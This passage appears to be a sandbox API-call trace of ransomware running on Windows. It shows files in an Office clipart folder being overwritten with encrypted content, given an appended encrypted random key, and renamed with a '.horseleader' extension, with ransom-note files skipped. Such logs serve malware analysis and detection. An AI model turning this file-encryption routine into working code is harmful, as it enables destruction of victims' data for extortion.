pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.437] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 67 [0253.437] StrStrW (lpFirst="BL00242_.WMF", lpSrch=".txt") returned 0x0 [0253.437] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4024) returned 1 [0253.437] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xfb8, lpOverlapped=0x0) returned 1 [0253.439] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff048, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.439] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xfb8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xfb8, lpOverlapped=0x0) returned 1 [0253.439] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.439] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.440] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.440] CloseHandle (hObject=0x158) returned 1 [0253.440] GetProcessHeap () returned 0x780000 [0253.440] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.440] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.horseleader") returned 79 [0253.440] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00242_.wmf.horseleader")) returned 1 [0253.441] GetProcessHeap () returned 0x780000 [0253.441] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.441] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5124300, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe5124300, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x386c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00247_.WMF", cAlternateFileName="")) returned 1 [0253.441] lstrcmpiW (lpString1="BL00247_.WMF", lpString2="Windows") returned -1 [0253.441] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 67 [0253.441] StrStrIW (lpFirst="BL00247_.WMF", lpSrch=".horseleader") returned 0x0 [0253.441] lstrcmpW (lpString1="BL00247_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.442] lstrcmpW (lpString1="BL00247_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.442] lstrlenW (lpString=".testttjffg") returned 11 [0253.442] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.442] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.442] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.442] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 67 [0253.443] StrStrW (lpFirst="BL00247_.WMF", lpSrch=".txt") returned 0x0 [0253.443] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14444) returned 1 [0253.443] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x386c, lpOverlapped=0x0) returned 1 [0253.445] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc794, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.445] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x386c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x386c, lpOverlapped=0x0) returned 1 [0253.445] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.445] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.445] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.446] CloseHandle (hObject=0x158) returned 1 [0253.446] GetProcessHeap () returned 0x780000 [0253.446] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.446] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.horseleader") returned 79 [0253.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.horseleader")) returned 1 [0253.447] GetProcessHeap () returned 0x780000 [0253.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.447] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b9eb00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9b9eb00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00248_.WMF", cAlternateFileName="")) returned 1 [0253.447] lstrcmpiW (lpString1="BL00248_.WMF", lpString2="Windows") returned -1 [0253.447] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 67 [0253.447] StrStrIW (lpFirst="BL00248_.WMF", lpSrch=".horseleader") returned 0x0 [0253.447] lstrcmpW (lpString1="BL00248_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.447] lstrcmpW (lpString1="BL00248_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.447] lstrlenW (lpString=".testttjffg") returned 11 [0253.447] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.447] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.447] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 67 [0253.448] StrStrW (lpFirst="BL00248_.WMF", lpSrch=".txt") returned 0x0 [0253.448] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1536) returned 1 [0253.448] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0253.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.463] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0253.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.463] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.463] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.463] CloseHandle (hObject=0x158) returned 1 [0253.463] GetProcessHeap () returned 0x780000 [0253.463] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.464] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.horseleader") returned 79 [0253.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.horseleader")) returned 1 [0253.465] GetProcessHeap () returned 0x780000 [0253.465] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.465] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b67a200, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b67a200, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00252_.WMF", cAlternateFileName="")) returned 1 [0253.465] lstrcmpiW (lpString1="BL00252_.WMF", lpString2="Windows") returned -1 [0253.465] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 67 [0253.465] StrStrIW (lpFirst="BL00252_.WMF", lpSrch=".horseleader") returned 0x0 [0253.465] lstrcmpW (lpString1="BL00252_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.465] lstrcmpW (lpString1="BL00252_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.465] lstrlenW (lpString=".testttjffg") returned 11 [0253.465] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.465] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.465] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.466] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 67 [0253.466] StrStrW (lpFirst="BL00252_.WMF", lpSrch=".txt") returned 0x0 [0253.466] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4708) returned 1 [0253.466] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1264, lpOverlapped=0x0) returned 1 [0253.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.468] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1264, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1264, lpOverlapped=0x0) returned 1 [0253.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.468] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.469] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.469] CloseHandle (hObject=0x158) returned 1 [0253.469] GetProcessHeap () returned 0x780000 [0253.469] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.469] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.horseleader") returned 79 [0253.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.horseleader")) returned 1 [0253.470] GetProcessHeap () returned 0x780000 [0253.470] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9e7400, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c9e7400, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00254_.WMF", cAlternateFileName="")) returned 1 [0253.470] lstrcmpiW (lpString1="BL00254_.WMF", lpString2="Windows") returned -1 [0253.470] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 67 [0253.470] StrStrIW (lpFirst="BL00254_.WMF", lpSrch=".horseleader") returned 0x0 [0253.470] lstrcmpW (lpString1="BL00254_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.470] lstrcmpW (lpString1="BL00254_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.470] lstrlenW (lpString=".testttjffg") returned 11 [0253.470] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.470] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.470] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 67 [0253.472] StrStrW (lpFirst="BL00254_.WMF", lpSrch=".txt") returned 0x0 [0253.472] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1736) returned 1 [0253.472] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6c8, lpOverlapped=0x0) returned 1 [0253.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.474] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6c8, lpOverlapped=0x0) returned 1 [0253.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.474] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.475] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.475] CloseHandle (hObject=0x158) returned 1 [0253.475] GetProcessHeap () returned 0x780000 [0253.475] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.475] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.horseleader") returned 79 [0253.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf.horseleader")) returned 1 [0253.476] GetProcessHeap () returned 0x780000 [0253.476] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.476] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae0bf00, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ae0bf00, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00261_.WMF", cAlternateFileName="")) returned 1 [0253.476] lstrcmpiW (lpString1="BL00261_.WMF", lpString2="Windows") returned -1 [0253.476] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 67 [0253.476] StrStrIW (lpFirst="BL00261_.WMF", lpSrch=".horseleader") returned 0x0 [0253.476] lstrcmpW (lpString1="BL00261_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.476] lstrcmpW (lpString1="BL00261_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.476] lstrlenW (lpString=".testttjffg") returned 11 [0253.476] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.476] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.476] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.477] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 67 [0253.477] StrStrW (lpFirst="BL00261_.WMF", lpSrch=".txt") returned 0x0 [0253.477] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12482) returned 1 [0253.477] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0253.480] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcf3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.480] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x30c2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0253.480] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.481] CloseHandle (hObject=0x158) returned 1 [0253.481] GetProcessHeap () returned 0x780000 [0253.481] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.481] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.horseleader") returned 79 [0253.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft 